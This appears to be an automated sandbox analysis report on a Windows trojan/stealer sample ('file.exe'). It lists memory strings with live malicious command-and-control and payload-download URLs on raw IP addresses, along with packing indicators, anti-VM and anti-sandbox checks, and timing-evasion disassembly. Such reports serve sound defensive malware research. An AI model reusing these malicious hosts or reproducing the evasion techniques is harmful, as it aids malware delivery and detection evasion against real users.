Source: file.exe, 00000000.00000002.1625467366.00000000013B9000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1557773005.00000000013FA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/steam/random.exe
Source: file.exe, 00000000.00000002.1625319750.000000000116A000.00000004.00000010.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/steam/random.exe4
Source: file.exe, 00000000.00000003.1557773005.00000000013FA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/~k
Source: file.exe, 00000000.00000002.1625467366.00000000013B9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206
Source: file.exe, 00000000.00000002.1625467366.00000000013A3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1625467366.00000000013B9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/
Source: file.exe, 00000000.00000002.1625467366.00000000013B9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/6c4adf523b719729.php
Source: file.exe, 00000000.00000002.1625467366.00000000013B9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/6c4adf523b719729.php/
Source: file.exe, 00000000.00000002.1625467366.00000000013B9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/6c4adf523b719729.php0
Source: file.exe, 00000000.00000002.1625467366.00000000013B9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/6c4adf523b719729.php2
Source: file.exe, 00000000.00000002.1625467366.00000000013B9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/6c4adf523b719729.phpL
Source: file.exe, 00000000.00000002.1625467366.00000000013B9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/6c4adf523b719729.phpX
Source: file.exe, 00000000.00000002.1625467366.00000000013B9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/6c4adf523b719729.phph
Source: file.exe, 00000000.00000002.1625467366.00000000013B9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/6c4adf523b719729.phpp
Source: file.exe, 00000000.00000002.1625467366.00000000013B9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/mandconnroutehelper.dll
Source: file.exe, 00000000.00000002.1625467366.000000000142E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/rosoft
Source: file.exe, 00000000.00000002.1625467366.00000000013B9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/sd
Source: file.exe, 00000000.00000002.1625467366.00000000013B9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/tdg
Source: file.exe, 00000000.00000003.1410587329.0000000005BEE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: file.exe, 00000000.00000003.1410587329.0000000005BEE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: file.exe, 00000000.00000003.1410587329.0000000005BEE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
Source: file.exe, 00000000.00000003.1410587329.0000000005BEE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: file.exe, 00000000.00000003.1410587329.0000000005BEE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: file.exe, 00000000.00000003.1410587329.0000000005BEE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: file.exe, 00000000.00000003.1410587329.0000000005BEE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
Source: file.exe, 00000000.00000003.1410587329.0000000005BEE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0
Source: file.exe, 00000000.00000003.1410587329.0000000005BEE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
Source: file.exe, 00000000.00000003.1410587329.0000000005BEE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://x1.c.lencr.org/0
Source: file.exe, 00000000.00000003.1410587329.0000000005BEE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://x1.i.lencr.org/0
Source: file.exe, 00000000.00000003.1380511134.0000000005C17000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: file.exe, 00000000.00000003.1432224690.0000000001437000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696495411400900000.2&ci=1696495411208.
Source: file.exe, 00000000.00000003.1432224690.0000000001437000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696495411400900000.1&ci=1696495411208.12791&cta
Source: file.exe, 00000000.00000003.1380511134.0000000005C17000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: file.exe, 00000000.00000003.1380511134.0000000005C17000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: file.exe, 00000000.00000003.1380511134.0000000005C17000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: file.exe, 00000000.00000003.1432224690.0000000001437000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://contile-images.services.mozilla.com/CuERQnIs4CzqjKBh9os6_h9d4CUDCHO3oiqmAQO6VLM.25122.jpg
Source: file.exe, 00000000.00000003.1432224690.0000000001437000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: file.exe, 00000000.00000003.1564217264.000000000891B000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.1627798849.00000000064DC000.00000040.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.rs/getrandom#nodejs-es-module-support
Source: file.exe, 00000000.00000003.1380511134.0000000005C17000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: file.exe, 00000000.00000003.1380511134.0000000005C17000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: file.exe, 00000000.00000003.1380511134.0000000005C17000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: file.exe, 00000000.00000003.1432224690.0000000001437000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pqd4plX4pbW1CbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi
Source: file.exe, 00000000.00000003.1482150214.000000000142E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1410739039.0000000005C7A000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1435484248.0000000005C7D000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1434867716.0000000005C7D000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1432158252.0000000005C77000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1557816294.000000000142E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1435121936.0000000005C7D000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1411774081.0000000005C7B000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1435963593.0000000005C7D000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1433915190.0000000005C7D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://navygenerayk.store/
Source: file.exe, 00000000.00000003.1433014514.000000000141B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1410542274.000000000141A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1436516458.000000000141B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1432239221.000000000141A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://navygenerayk.store/0
Source: file.exe, 00000000.00000003.1432885292.0000000005C7D000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1432158252.0000000005C77000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1396415390.0000000005C79000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://navygenerayk.store/7
Source: file.exe, 00000000.00000003.1379874519.0000000001410000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://navygenerayk.store/KU
Source: file.exe, 00000000.00000003.1455741546.000000000142E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1482150214.000000000142E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://navygenerayk.store/W
Source: file.exe, 00000000.00000003.1557773005.00000000013FA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://navygenerayk.store/Wi
Source: file.exe, 00000000.00000003.1557773005.00000000013FA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://navygenerayk.store/api
Source: file.exe, 00000000.00000003.1451115025.000000000142E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://navygenerayk.store/apiF
Source: file.exe, 00000000.00000003.1432832517.0000000001417000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://navygenerayk.store/apih
Source: file.exe, 00000000.00000003.1432239221.0000000001423000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://navygenerayk.store/apik
Source: file.exe, 00000000.00000003.1482150214.0000000001439000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1557590964.0000000001439000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1557796581.000000000143B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1625467366.000000000142E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1482231614.000000000143B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://navygenerayk.store/c
Source: file.exe, 00000000.00000003.1396415390.0000000005C79000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://navygenerayk.store/g
Source: file.exe, 00000000.00000003.1396415390.0000000005C79000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://navygenerayk.store/o
Source: file.exe, 00000000.00000003.1410085886.0000000005C76000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1410739039.0000000005C7A000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1411774081.0000000005C7B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://navygenerayk.store/w
Source: file.exe, 00000000.00000003.1415151344.0000000005F03000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: file.exe, 00000000.00000003.1415151344.0000000005F03000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
Source: file.exe, 00000000.00000003.1432224690.0000000001437000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_e149f5d53c9263616797a13067f7a114fa287709b159d0a5
Source: file.exe, 00000000.00000003.1380511134.0000000005C17000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: file.exe, 00000000.00000003.1380511134.0000000005C17000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: file.exe, 00000000.00000003.1432224690.0000000001437000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.invisalign.com/?utm_source=admarketplace&utm_medium=paidsearch&utm_campaign=Invisalign&u
Source: file.exe, 00000000.00000003.1415151344.0000000005F03000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.HCe2hc5EPKfq
Source: file.exe, 00000000.00000003.1415151344.0000000005F03000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.oX6J3D7V9Efv
Source: file.exe, 00000000.00000003.1415151344.0000000005F03000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: file.exe, 00000000.00000003.1415151344.0000000005F03000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: file.exe, 00000000.00000003.1415151344.0000000005F03000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/media/img/mozorg/mozilla-256.4720741d4108.jpg
Source: file.exe, 00000000.00000003.1415151344.0000000005F03000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.

Source: unknown	Network traffic detected: HTTP traffic on port 49733 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49733
Source: unknown	Network traffic detected: HTTP traffic on port 49782 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49741
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49762
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49750
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49771
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49782
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49793
Source: unknown	Network traffic detected: HTTP traffic on port 49726 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49741 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49762 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49793 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49750 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49726
Source: unknown	Network traffic detected: HTTP traffic on port 49771 -> 443

Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.9:49726 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.9:49733 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.9:49741 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.9:49750 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.9:49762 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.9:49771 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.9:49782 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.9:49793 version: TLS 1.2

System Summary

PE file contains section with special chars

Source: file.exe	Static PE information: section name:
Source: file.exe	Static PE information: section name: .idata

Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_01426D28	0_3_01426D28
Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_01426D28	0_3_01426D28
Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_01426D28	0_3_01426D28
Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_01426D28	0_3_01426D28

Source: file.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@1/0@7/3

Source: C:\Users\user\Desktop\file.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WDKI0JR2\5ZM6C371.htm

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: file.exe, 00000000.00000003.1396959902.0000000005BE5000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1380620739.0000000005BE7000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: file.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: file.exe	String found in binary or memory: OCRtlAllocateHeap3Cannot find '%s'. Please, re-install this applicationThunRTMain__vbaVarTstNeS

Source: C:\Users\user\Desktop\file.exe

File read: C:\Users\user\Desktop\file.exe

Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: rstrtmgr.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: netutils.dll	Jump to behavior

Source: file.exe

Static file information: File size 3204096 > 1048576

Source: file.exe

Static PE information: Raw size of anltzulc is bigger than: 0x100000 < 0x2b2800

Source:	Binary string: my_library.pdbU source: file.exe, 00000000.00000003.1564217264.000000000891B000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.1627798849.00000000064DC000.00000040.00000800.00020000.00000000.sdmp
Source:	Binary string: my_library.pdb source: file.exe, 00000000.00000003.1564217264.000000000891B000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.1627798849.00000000064DC000.00000040.00000800.00020000.00000000.sdmp

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Desktop\file.exe

Unpacked PE file: 0.2.file.exe.c0000.0.unpack :EW;.rsrc:W;.idata :W;anltzulc:EW;tzjtjjai:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;anltzulc:EW;tzjtjjai:EW;.taggant:EW;

Source: initial sample

Static PE information: section where entry point is pointing to: .taggant

Source: file.exe

Static PE information: real checksum: 0x31d1b4 should be: 0x319de8

Source: file.exe	Static PE information: section name:
Source: file.exe	Static PE information: section name: .idata
Source: file.exe	Static PE information: section name: anltzulc
Source: file.exe	Static PE information: section name: tzjtjjai
Source: file.exe	Static PE information: section name: .taggant

Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_0142B530 push eax; retf	0_3_0142B531
Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_0142B530 push eax; retf	0_3_0142B531
Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_014289B1 push dword ptr [esi]; ret	0_3_014296E9
Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_014289B1 push dword ptr [esi]; ret	0_3_014296E9
Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_0142B530 push eax; retf	0_3_0142B531
Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_0142B530 push eax; retf	0_3_0142B531
Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_014289B1 push dword ptr [esi]; ret	0_3_014296E9
Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_014289B1 push dword ptr [esi]; ret	0_3_014296E9

Source: file.exe

Static PE information: section name: entropy: 7.062234749367177

Boot Survival

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Source: C:\Users\user\Desktop\file.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: Regmonclass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: Filemonclass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: Regmonclass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Process information set: NOOPENFILEERRORBOX

Jump to behavior

Malware Analysis System Evasion

Query firmware table information (likely to detect VMs)

Source: C:\Users\user\Desktop\file.exe

System information queried: FirmwareTableInformation

Jump to behavior

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Source: C:\Users\user\Desktop\file.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11F2F1 second address: 11F2F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11F2F5 second address: 11EBBA instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 mov dword ptr [esp], eax 0x0000000a stc 0x0000000b push dword ptr [ebp+122D06E9h] 0x00000011 jns 00007F4E04B2CB1Ch 0x00000017 stc 0x00000018 call dword ptr [ebp+122D1DD5h] 0x0000001e pushad 0x0000001f mov dword ptr [ebp+122D1DBCh], edi 0x00000025 xor eax, eax 0x00000027 cld 0x00000028 jnp 00007F4E04B2CB1Ch 0x0000002e sub dword ptr [ebp+122D35C3h], ebx 0x00000034 mov edx, dword ptr [esp+28h] 0x00000038 clc 0x00000039 mov dword ptr [ebp+122D2D54h], eax 0x0000003f add dword ptr [ebp+122D1DBCh], esi 0x00000045 mov esi, 0000003Ch 0x0000004a jmp 00007F4E04B2CB1Bh 0x0000004f jmp 00007F4E04B2CB1Ch 0x00000054 add esi, dword ptr [esp+24h] 0x00000058 add dword ptr [ebp+122D1DBCh], ecx 0x0000005e lodsw 0x00000060 mov dword ptr [ebp+122D1DBCh], esi 0x00000066 jng 00007F4E04B2CB1Ch 0x0000006c mov dword ptr [ebp+122D29D9h], edx 0x00000072 add eax, dword ptr [esp+24h] 0x00000076 jmp 00007F4E04B2CB29h 0x0000007b mov ebx, dword ptr [esp+24h] 0x0000007f sub dword ptr [ebp+122D1DBCh], edi 0x00000085 push eax 0x00000086 push eax 0x00000087 push eax 0x00000088 push edx 0x00000089 jo 00007F4E04B2CB16h 0x0000008f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 29DDA2 second address: 29DDA8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 29DDA8 second address: 29DDB2 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F4E04B2CB16h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 293599 second address: 2935BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push ecx 0x00000008 jmp 00007F4E04C4CC07h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2935BA second address: 2935BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 29D026 second address: 29D03A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 jmp 00007F4E04C4CBFDh 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 29D330 second address: 29D334 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
